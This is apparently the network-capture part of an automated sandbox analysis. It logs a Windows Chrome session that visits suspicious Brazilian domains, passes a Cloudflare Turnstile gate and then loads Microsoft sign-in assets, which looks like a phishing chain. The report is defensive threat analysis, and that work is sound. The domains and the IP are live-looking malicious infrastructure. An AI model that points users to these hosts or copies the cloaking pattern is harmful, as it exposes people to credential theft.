                                                        Mar 17, 2025 17:43:02.200270891 CET4434979523.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:02.200402975 CET49795443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:43:02.200767994 CET49795443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:43:02.200782061 CET4434979523.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:02.699784994 CET4434979523.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:02.700004101 CET49795443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:43:02.700028896 CET4434979523.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:02.700167894 CET49795443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:43:02.700184107 CET4434979523.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:02.935004950 CET4434979523.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:02.935081005 CET4434979523.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:02.935121059 CET49795443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:43:02.938462019 CET49795443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:43:02.938479900 CET4434979523.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:03.416517019 CET49797443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:43:03.416582108 CET4434979723.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:03.416654110 CET49797443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:43:03.416800976 CET49797443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:43:03.416815996 CET4434979723.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:04.896014929 CET4434979723.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:04.896500111 CET49797443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:43:04.896500111 CET49797443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:43:04.896532059 CET4434979723.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:04.896547079 CET4434979723.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:04.897718906 CET8049711217.20.57.19192.168.2.4
                                                        Mar 17, 2025 17:43:04.897912025 CET4971180192.168.2.4217.20.57.19
                                                        Mar 17, 2025 17:43:04.897912025 CET4971180192.168.2.4217.20.57.19
                                                        Mar 17, 2025 17:43:04.902632952 CET8049711217.20.57.19192.168.2.4
                                                        Mar 17, 2025 17:43:05.059919119 CET4434979723.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:05.059967995 CET4434979723.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:05.061431885 CET49797443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:43:05.061616898 CET49797443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:43:05.061629057 CET4434979723.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:07.414974928 CET8049715217.20.57.19192.168.2.4
                                                        Mar 17, 2025 17:43:07.415167093 CET4971580192.168.2.4217.20.57.19
                                                        Mar 17, 2025 17:43:07.415255070 CET4971580192.168.2.4217.20.57.19
                                                        Mar 17, 2025 17:43:07.419908047 CET8049715217.20.57.19192.168.2.4
                                                        Mar 17, 2025 17:43:07.752451897 CET8049716217.20.57.19192.168.2.4
                                                        Mar 17, 2025 17:43:07.752558947 CET4971680192.168.2.4217.20.57.19
                                                        Mar 17, 2025 17:43:08.414748907 CET8049717217.20.57.19192.168.2.4
                                                        Mar 17, 2025 17:43:08.414843082 CET4971780192.168.2.4217.20.57.19
                                                        Mar 17, 2025 17:43:08.414937019 CET4971780192.168.2.4217.20.57.19
                                                        Mar 17, 2025 17:43:08.419599056 CET8049717217.20.57.19192.168.2.4
                                                        Mar 17, 2025 17:43:08.520278931 CET4971380192.168.2.4142.250.186.163
                                                        Mar 17, 2025 17:43:08.525139093 CET8049713142.250.186.163192.168.2.4
                                                        Mar 17, 2025 17:43:08.527635098 CET4971380192.168.2.4142.250.186.163
                                                        Mar 17, 2025 17:43:08.791234970 CET49714443192.168.2.42.19.122.41
                                                        Mar 17, 2025 17:43:08.791567087 CET4971680192.168.2.4217.20.57.19
                                                        Mar 17, 2025 17:43:24.193789005 CET49805443192.168.2.4142.250.185.132
                                                        Mar 17, 2025 17:43:24.193834066 CET44349805142.250.185.132192.168.2.4
                                                        Mar 17, 2025 17:43:24.193926096 CET49805443192.168.2.4142.250.185.132
                                                        Mar 17, 2025 17:43:24.194084883 CET49805443192.168.2.4142.250.185.132
                                                        Mar 17, 2025 17:43:24.194099903 CET44349805142.250.185.132192.168.2.4
                                                        Mar 17, 2025 17:43:24.850486040 CET44349805142.250.185.132192.168.2.4
                                                        Mar 17, 2025 17:43:24.850930929 CET49805443192.168.2.4142.250.185.132
                                                        Mar 17, 2025 17:43:24.850967884 CET44349805142.250.185.132192.168.2.4
                                                        Mar 17, 2025 17:43:27.145838022 CET49751443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:43:27.145867109 CET4434975123.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:29.279930115 CET49807443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:43:29.279987097 CET4434980723.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:29.280092955 CET49807443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:43:29.280291080 CET49807443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:43:29.280303001 CET4434980723.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:29.757507086 CET4434980723.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:29.757858992 CET49807443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:43:29.757895947 CET4434980723.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:29.758095980 CET49807443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:43:29.758095980 CET49807443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:43:29.758111954 CET4434980723.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:29.758121014 CET4434980723.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:30.288170099 CET4434980723.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:30.288283110 CET4434980723.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:30.288423061 CET49807443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:43:30.288423061 CET49807443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:43:30.484671116 CET49807443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:43:30.484705925 CET4434980723.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:30.538086891 CET49809443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:43:30.538096905 CET4434980923.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:30.538141966 CET49809443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:43:30.538392067 CET49809443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:43:30.538403988 CET4434980923.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:31.045542002 CET4434980923.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:31.045856953 CET49809443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:43:31.045888901 CET4434980923.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:31.046067953 CET49809443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:43:31.046076059 CET4434980923.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:31.457638025 CET4434980923.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:31.457710981 CET4434980923.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:31.457732916 CET49809443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:43:31.457783937 CET49809443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:43:31.458930016 CET49809443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:43:31.458941936 CET4434980923.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:34.747983932 CET44349805142.250.185.132192.168.2.4
                                                        Mar 17, 2025 17:43:34.748044968 CET44349805142.250.185.132192.168.2.4
                                                        Mar 17, 2025 17:43:34.748107910 CET49805443192.168.2.4142.250.185.132
                                                        Mar 17, 2025 17:43:35.897804976 CET49805443192.168.2.4142.250.185.132
                                                        Mar 17, 2025 17:43:35.897839069 CET44349805142.250.185.132192.168.2.4
                                                        Mar 17, 2025 17:43:43.895478964 CET49751443192.168.2.423.95.206.231
                                                        Mar 17, 2025 17:43:43.895593882 CET4434975123.95.206.231192.168.2.4
                                                        Mar 17, 2025 17:43:43.895673037 CET49751443192.168.2.423.95.206.231
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Mar 17, 2025 17:42:19.980788946 CET53654861.1.1.1192.168.2.4
                                                        Mar 17, 2025 17:42:19.989409924 CET53544931.1.1.1192.168.2.4
                                                        Mar 17, 2025 17:42:21.127747059 CET53585851.1.1.1192.168.2.4
                                                        Mar 17, 2025 17:42:21.282870054 CET53652691.1.1.1192.168.2.4
                                                        Mar 17, 2025 17:42:24.131076097 CET5651353192.168.2.41.1.1.1
                                                        Mar 17, 2025 17:42:24.131237030 CET6256953192.168.2.41.1.1.1
                                                        Mar 17, 2025 17:42:24.137701035 CET53565131.1.1.1192.168.2.4
                                                        Mar 17, 2025 17:42:24.137779951 CET53625691.1.1.1192.168.2.4
                                                        Mar 17, 2025 17:42:25.288791895 CET6014053192.168.2.41.1.1.1
                                                        Mar 17, 2025 17:42:25.289175987 CET5901553192.168.2.41.1.1.1
                                                        Mar 17, 2025 17:42:25.646868944 CET53590151.1.1.1192.168.2.4
                                                        Mar 17, 2025 17:42:25.811065912 CET53601401.1.1.1192.168.2.4
                                                        Mar 17, 2025 17:42:27.079845905 CET5170653192.168.2.41.1.1.1
                                                        Mar 17, 2025 17:42:27.079979897 CET5661553192.168.2.41.1.1.1
                                                        Mar 17, 2025 17:42:27.086896896 CET53517061.1.1.1192.168.2.4
                                                        Mar 17, 2025 17:42:27.086910963 CET53566151.1.1.1192.168.2.4
                                                        Mar 17, 2025 17:42:28.857695103 CET6551153192.168.2.41.1.1.1
                                                        Mar 17, 2025 17:42:28.857851982 CET5794253192.168.2.41.1.1.1
                                                        Mar 17, 2025 17:42:29.046817064 CET53655111.1.1.1192.168.2.4
                                                        Mar 17, 2025 17:42:29.047178984 CET53579421.1.1.1192.168.2.4
                                                        Mar 17, 2025 17:42:30.520440102 CET5493453192.168.2.41.1.1.1
                                                        Mar 17, 2025 17:42:30.520979881 CET5633153192.168.2.41.1.1.1
                                                        Mar 17, 2025 17:42:30.527317047 CET53549341.1.1.1192.168.2.4
                                                        Mar 17, 2025 17:42:30.528404951 CET53563311.1.1.1192.168.2.4
                                                        Mar 17, 2025 17:42:38.502084017 CET53563391.1.1.1192.168.2.4
                                                        Mar 17, 2025 17:42:42.525348902 CET6386053192.168.2.41.1.1.1
                                                        Mar 17, 2025 17:42:42.525480032 CET5612853192.168.2.41.1.1.1
                                                        Mar 17, 2025 17:42:42.937901974 CET53638601.1.1.1192.168.2.4
                                                        Mar 17, 2025 17:42:43.012342930 CET53561281.1.1.1192.168.2.4
                                                        Mar 17, 2025 17:42:48.342598915 CET6328153192.168.2.41.1.1.1
                                                        Mar 17, 2025 17:42:48.343570948 CET5749553192.168.2.41.1.1.1
                                                        Mar 17, 2025 17:42:48.383229017 CET53574951.1.1.1192.168.2.4
                                                        Mar 17, 2025 17:42:48.391232967 CET53632811.1.1.1192.168.2.4
                                                        Mar 17, 2025 17:42:53.037360907 CET5143353192.168.2.41.1.1.1
                                                        Mar 17, 2025 17:42:53.037678957 CET6118153192.168.2.41.1.1.1
                                                        Mar 17, 2025 17:42:53.411212921 CET53514331.1.1.1192.168.2.4
                                                        Mar 17, 2025 17:42:53.509949923 CET53611811.1.1.1192.168.2.4
                                                        Mar 17, 2025 17:42:57.419935942 CET53654031.1.1.1192.168.2.4
                                                        Mar 17, 2025 17:43:02.578888893 CET53643391.1.1.1192.168.2.4
                                                        Mar 17, 2025 17:43:19.313421011 CET53586631.1.1.1192.168.2.4
                                                        Mar 17, 2025 17:43:19.926292896 CET53549181.1.1.1192.168.2.4
                                                        Mar 17, 2025 17:43:22.747622967 CET53621451.1.1.1192.168.2.4
                                                        Mar 17, 2025 17:43:29.966434956 CET138138192.168.2.4192.168.2.255
                                                        TimestampSource IPDest IPChecksumCodeType
                                                        Mar 17, 2025 17:42:43.012439013 CET192.168.2.41.1.1.1c23a(Port unreachable)Destination Unreachable
                                                        Mar 17, 2025 17:42:53.517083883 CET192.168.2.41.1.1.1c23a(Port unreachable)Destination Unreachable
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Mar 17, 2025 17:42:24.131076097 CET192.168.2.41.1.1.10x69c1Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                        Mar 17, 2025 17:42:24.131237030 CET192.168.2.41.1.1.10xd2aaStandard query (0)www.google.com65IN (0x0001)false
                                                        Mar 17, 2025 17:42:25.288791895 CET192.168.2.41.1.1.10x7289Standard query (0)h89s9dhj.ccbequipamentos.com.brA (IP address)IN (0x0001)false
                                                        Mar 17, 2025 17:42:25.289175987 CET192.168.2.41.1.1.10xfbbbStandard query (0)h89s9dhj.ccbequipamentos.com.br65IN (0x0001)false
                                                        Mar 17, 2025 17:42:27.079845905 CET192.168.2.41.1.1.10xf107Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                        Mar 17, 2025 17:42:27.079979897 CET192.168.2.41.1.1.10x3661Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                        Mar 17, 2025 17:42:28.857695103 CET192.168.2.41.1.1.10x2f68Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                        Mar 17, 2025 17:42:28.857851982 CET192.168.2.41.1.1.10xf5fcStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                        Mar 17, 2025 17:42:30.520440102 CET192.168.2.41.1.1.10x7e42Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                        Mar 17, 2025 17:42:30.520979881 CET192.168.2.41.1.1.10x6ab8Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                        Mar 17, 2025 17:42:42.525348902 CET192.168.2.41.1.1.10x136eStandard query (0)hapiinenstys.criadordeconexoes.com.brA (IP address)IN (0x0001)false
                                                        Mar 17, 2025 17:42:42.525480032 CET192.168.2.41.1.1.10x57Standard query (0)hapiinenstys.criadordeconexoes.com.br65IN (0x0001)false
                                                        Mar 17, 2025 17:42:48.342598915 CET192.168.2.41.1.1.10xb115Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                        Mar 17, 2025 17:42:48.343570948 CET192.168.2.41.1.1.10x4f43Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                        Mar 17, 2025 17:42:53.037360907 CET192.168.2.41.1.1.10x5bb2Standard query (0)hapiinenstys.criadordeconexoes.com.brA (IP address)IN (0x0001)false
                                                        Mar 17, 2025 17:42:53.037678957 CET192.168.2.41.1.1.10xfab1Standard query (0)hapiinenstys.criadordeconexoes.com.br65IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Mar 17, 2025 17:42:24.137701035 CET1.1.1.1192.168.2.40x69c1No error (0)www.google.com142.250.185.132A (IP address)IN (0x0001)false
                                                        Mar 17, 2025 17:42:24.137779951 CET1.1.1.1192.168.2.40xd2aaNo error (0)www.google.com65IN (0x0001)false
                                                        Mar 17, 2025 17:42:25.811065912 CET1.1.1.1192.168.2.40x7289No error (0)h89s9dhj.ccbequipamentos.com.br23.95.206.231A (IP address)IN (0x0001)false
                                                        Mar 17, 2025 17:42:27.086896896 CET1.1.1.1192.168.2.40xf107No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                        Mar 17, 2025 17:42:27.086896896 CET1.1.1.1192.168.2.40xf107No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                        Mar 17, 2025 17:42:27.086910963 CET1.1.1.1192.168.2.40x3661No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                        Mar 17, 2025 17:42:29.046817064 CET1.1.1.1192.168.2.40x2f68No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                        Mar 17, 2025 17:42:29.046817064 CET1.1.1.1192.168.2.40x2f68No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                        Mar 17, 2025 17:42:29.047178984 CET1.1.1.1192.168.2.40xf5fcNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                        Mar 17, 2025 17:42:30.527317047 CET1.1.1.1192.168.2.40x7e42No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                        Mar 17, 2025 17:42:30.527317047 CET1.1.1.1192.168.2.40x7e42No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                        Mar 17, 2025 17:42:30.528404951 CET1.1.1.1192.168.2.40x6ab8No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                        Mar 17, 2025 17:42:42.937901974 CET1.1.1.1192.168.2.40x136eNo error (0)hapiinenstys.criadordeconexoes.com.br23.95.206.231A (IP address)IN (0x0001)false
                                                        Mar 17, 2025 17:42:46.324810982 CET1.1.1.1192.168.2.40xe012No error (0)csp-afd-prod.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 17, 2025 17:42:46.324810982 CET1.1.1.1192.168.2.40xe012No error (0)azurefd-t-prod.trafficmanager.netshed.dual-low.s-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 17, 2025 17:42:46.334618092 CET1.1.1.1192.168.2.40x7b70No error (0)csp-afd-prod.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 17, 2025 17:42:46.334618092 CET1.1.1.1192.168.2.40x7b70No error (0)azurefd-t-prod.trafficmanager.netshed.dual-low.s-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 17, 2025 17:42:46.334618092 CET1.1.1.1192.168.2.40x7b70No error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 17, 2025 17:42:46.334618092 CET1.1.1.1192.168.2.40x7b70No error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                                                        Mar 17, 2025 17:42:48.349025965 CET1.1.1.1192.168.2.40xaa84No error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 17, 2025 17:42:48.349025965 CET1.1.1.1192.168.2.40xaa84No error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                                                        Mar 17, 2025 17:42:48.383229017 CET1.1.1.1192.168.2.40x4f43No error (0)aadcdn.msftauth.netwww.tm.aadcdn.msftauth.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 17, 2025 17:42:48.383229017 CET1.1.1.1192.168.2.40x4f43No error (0)www.tm.aadcdn.msftauth.trafficmanager.netaadcdn.msftauth.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 17, 2025 17:42:48.383229017 CET1.1.1.1192.168.2.40x4f43No error (0)aadcdn.msftauth.edgekey.nete329293.dscd.akamaiedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 17, 2025 17:42:48.391232967 CET1.1.1.1192.168.2.40xb115No error (0)aadcdn.msftauth.netwww.tm.aadcdn.msftauth.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 17, 2025 17:42:48.391232967 CET1.1.1.1192.168.2.40xb115No error (0)www.tm.aadcdn.msftauth.akadns.netaadcdn.msftauth.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 17, 2025 17:42:48.391232967 CET1.1.1.1192.168.2.40xb115No error (0)aadcdn.msftauth.edgekey.nete329293.dscd.akamaiedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Mar 17, 2025 17:42:48.391232967 CET1.1.1.1192.168.2.40xb115No error (0)e329293.dscd.akamaiedge.net92.123.12.139A (IP address)IN (0x0001)false
                                                        Mar 17, 2025 17:42:48.391232967 CET1.1.1.1192.168.2.40xb115No error (0)e329293.dscd.akamaiedge.net92.123.12.181A (IP address)IN (0x0001)false
                                                        Mar 17, 2025 17:42:53.411212921 CET1.1.1.1192.168.2.40x5bb2No error (0)hapiinenstys.criadordeconexoes.com.br23.95.206.231A (IP address)IN (0x0001)false
                                                        • h89s9dhj.ccbequipamentos.com.br
                                                          • challenges.cloudflare.com
                                                          • hapiinenstys.criadordeconexoes.com.br
                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.44972923.95.206.2314436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:26 UTC819OUTGET /?noiajvga=2bdd817baf4e46e28f740a82bff8e850881b2c9159d1f9f1d332e339e76eea813a3f5893897cb7539a84e2eac2026594b5d62df0bbf5820b252c5afd2b02c9cd HTTP/1.1
                                                        Host: h89s9dhj.ccbequipamentos.com.br
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-17 16:42:26 UTC420INHTTP/1.1 302 Found
                                                        Set-Cookie: qPdM=qVP87EaFGCQn; path=/; samesite=none; secure; httponly
                                                        Set-Cookie: qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk; path=/; samesite=none; secure; httponly
                                                        location: /?noiajvga=cebc15b3c86fa69be7285330a66657219c1287ff53c1f7059daa44d10ef1952d669e891ae8484a544c8d16f0be8cc4af98aec84015acb9fd06d2a3ccc941854c
                                                        Date: Mon, 17 Mar 2025 16:42:26 GMT
                                                        Connection: close
                                                        Transfer-Encoding: chunked
                                                        2025-03-17 16:42:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.44972823.95.206.2314436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:26 UTC884OUTGET /?noiajvga=cebc15b3c86fa69be7285330a66657219c1287ff53c1f7059daa44d10ef1952d669e891ae8484a544c8d16f0be8cc4af98aec84015acb9fd06d2a3ccc941854c HTTP/1.1
                                                        Host: h89s9dhj.ccbequipamentos.com.br
                                                        Connection: keep-alive
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=qVP87EaFGCQn; qPdM.sig=570GYc2IN2-96anUzPhqwcPBcBk
                                                        2025-03-17 16:42:27 UTC142INHTTP/1.1 200 OK
                                                        Content-Type: text/html;charset=UTF-8
                                                        Date: Mon, 17 Mar 2025 16:42:26 GMT
                                                        Connection: close
                                                        Transfer-Encoding: chunked
                                                        2025-03-17 16:42:27 UTC3272INData Raw: 63 62 63 0d 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 2d 55 53 3e 3c 68 65 61 64 3e 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 3f 6f 6e 6c 6f 61 64 3d 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 22 3e 0a 3c 2f 73 63 72 69 70 74 3e 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d
                                                        Data Ascii: cbc<!doctype html><html lang=en-US><head> <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script> <title>Just a moment...</title> <meta content="width=device-width,initial-scale=1" name=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.449731104.18.94.414436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:27 UTC631OUTGET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://h89s9dhj.ccbequipamentos.com.br/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-17 16:42:28 UTC386INHTTP/1.1 302 Found
                                                        Date: Mon, 17 Mar 2025 16:42:27 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        access-control-allow-origin: *
                                                        cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                        cross-origin-resource-policy: cross-origin
                                                        location: /turnstile/v0/g/f3b948d8acb8/api.js
                                                        Server: cloudflare
                                                        CF-RAY: 921df194b94f19c7-EWR
                                                        alt-svc: h3=":443"; ma=86400


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.449733104.18.94.414436224C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-17 16:42:28 UTC615OUTGET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://h89s9dhj.ccbequipamentos.com.br/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-17 16:42:28 UTC471INHTTP/1.1 200 OK
                                                        Date: Mon, 17 Mar 2025 16:42:28 GMT
                                                        Content-Type: application/javascript; charset=UTF-8
                                                        Content-Length: 48239
                                                        Connection: close
                                                        accept-ranges: bytes
                                                        last-modified: Fri, 28 Feb 2025 15:24:08 GMT
                                                        cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                        access-control-allow-origin: *
                                                        cross-origin-resource-policy: cross-origin
                                                        Server: cloudflare
                                                        CF-RAY: 921df1993d913869-EWR
                                                        alt-svc: h3=":443"; ma=86400
